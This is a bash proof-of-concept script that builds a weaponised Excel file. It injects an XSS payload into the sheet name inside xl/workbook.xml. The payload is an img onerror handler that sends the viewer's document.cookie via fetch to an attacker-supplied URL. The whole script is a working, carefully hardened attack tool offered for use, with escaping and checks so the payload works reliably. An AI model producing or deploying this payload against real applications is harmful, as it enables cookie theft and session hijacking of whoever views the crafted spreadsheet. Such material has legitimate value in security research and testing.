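#!/bin/bash
# Build bad.xlsx from poc.xlsx by injecting an XSS payload into the sheet name
# stored in xl/workbook.xml. The injected <img onerror=...> handler sends
# document.cookie of whoever renders the sheet name to the URL given as $1.
#
# Usage:  ./script.sh http://ip:port
# Needs:  poc.xlsx in the current directory whose xl/workbook.xml contains the
#         literal marker `img src=x` (the placeholder sheet name); `unzip` and
#         `zip` on PATH.
# Writes: bad.xlsx (copy of poc.xlsx with the patched workbook.xml) and the
#         extracted xl/workbook.xml, left in place so it can be re-edited and
#         re-zipped by hand with a different payload.
set -euo pipefail

die() { printf '%s\n' "$*" >&2; exit 1; }

if [[ -z "${1:-}" ]]; then
  # URL to exfiltrate the victim's cookie
  echo "[*] Usage: $0 http://ip:port" >&2
  exit 1
fi
url=$1
file="poc.xlsx"
bad="bad.xlsx"
marker="img src=x"
workbook="xl/workbook.xml"

for tool in unzip zip; do
  command -v "$tool" >/dev/null 2>&1 || die "[-] $tool not found in PATH"
done
[[ -f "$file" ]] || die "[-] $file not found in $PWD"

# The URL ends up inside a single-quoted JS string, inside an unquoted HTML
# attribute value, inside an XML attribute. A single quote or whitespace would
# terminate one of those contexts early, so refuse instead of silently writing
# a broken payload.
if [[ "$url" == *"'"* || "$url" == *[[:space:]]* ]]; then
  die "[-] URL must not contain single quotes or whitespace"
fi

# workbook.xml is XML: entity-encode the characters that are special in an
# attribute value so the archive stays well-formed; the consuming XML parser
# turns them back into the raw URL. The replacement strings are quoted so
# bash never treats '&' as "the matched text" (patsub_replacement, bash 5.2+).
xml_url=${url//&/"&amp;"}
xml_url=${xml_url//</"&lt;"}
xml_url=${xml_url//>/"&gt;"}
xml_url=${xml_url//\"/"&quot;"}

payload="img src=x onerror=fetch('${xml_url}?'+document.cookie)"

echo "[*] unzipping poc file"
# -o: overwrite a stale xl/workbook.xml left by a previous run instead of
# stopping at unzip's interactive "replace?" prompt.
unzip -o -q "$file" "$workbook"

echo "[*] updating sheet name"
content=$(<"$workbook")
# Fail loudly if the placeholder is missing; otherwise bad.xlsx would just be a
# clean copy of poc.xlsx and the PoC would silently do nothing.
[[ "$content" == *"$marker"* ]] || die "[-] marker '$marker' not found in $workbook"
# Plain bash substitution instead of sed: both sides are quoted, so the marker
# is matched literally and nothing in the URL is interpreted as a delimiter,
# backreference or escape. Every occurrence of the marker is replaced.
printf '%s\n' "${content//"$marker"/"$payload"}" > "$workbook"

cp -- "$file" "$bad"
# zip replaces the existing xl/workbook.xml entry in the copied archive.
zip -q "$bad" "$workbook"
echo "[+] created $bad"
# update the xl/workbook.xml file with another payload if required, then re-run
# the zip step above; uncomment the next line to clean up instead.
# rm -rf xl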